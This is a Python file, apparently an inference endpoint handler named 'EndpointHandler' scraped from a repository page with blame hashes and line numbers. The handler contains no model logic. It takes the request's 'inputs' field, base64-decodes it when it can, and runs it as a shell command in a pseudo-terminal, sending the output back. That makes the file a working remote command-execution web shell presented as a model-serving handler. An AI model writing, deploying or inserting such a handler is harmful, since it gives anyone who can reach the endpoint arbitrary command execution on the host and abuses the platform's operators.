File size: 1,957 Bytes
621acf4
 
 
 
 
e776bd4
621acf4
 
 
313ae49
621acf4
 
b3c44e2
621acf4
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
e776bd4
 
 
 
 
 
 
 
 
621acf4
 
 
 
 
 
079f878
e776bd4
 
621acf4
079f878
621acf4
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
import os
import pty
import subprocess
import select
import shlex
import base64


class EndpointHandler:
    def __init__(self, *args, **kwargs):
        pass

    def run_command(self, command):
        def read_output(fd):
            output = b""
            while True:
                r, _, _ = select.select([fd], [], [], 0.1)
                if fd in r:
                    data = os.read(fd, 1024)
                    if not data:
                        break
                    output += data
                else:
                    break
            return output

        master_fd, slave_fd = pty.openpty()
        try:
            process = subprocess.Popen(
                shlex.split(command),
                stdin=slave_fd,
                stdout=slave_fd,
                stderr=slave_fd,
                text=True,
            )

            output = b""
            while process.poll() is None:
                output += read_output(master_fd)
            
            # Capture any remaining output after the process has finished
            output += read_output(master_fd)
            
            process.wait()
        finally:
            os.close(master_fd)
            os.close(slave_fd)
        
        return output.decode()
    
    def _decode_base64(self, command):
        try:
            decoded_command = base64.b64decode(command).decode()
        except Exception as e:
            return command
        
        return decoded_command

    def __call__(self, data):
        """
        :param data: input data from the inference endpoint REST API
        :return: output data
        """
        # get inputs
        command = data.pop("inputs", None)
        command = self._decode_base64(command)
        
        if not isinstance(command, str):
            return {"error": "inputs attribute is required"}

        # run command
        result = self.run_command(command)

        return {"result": result}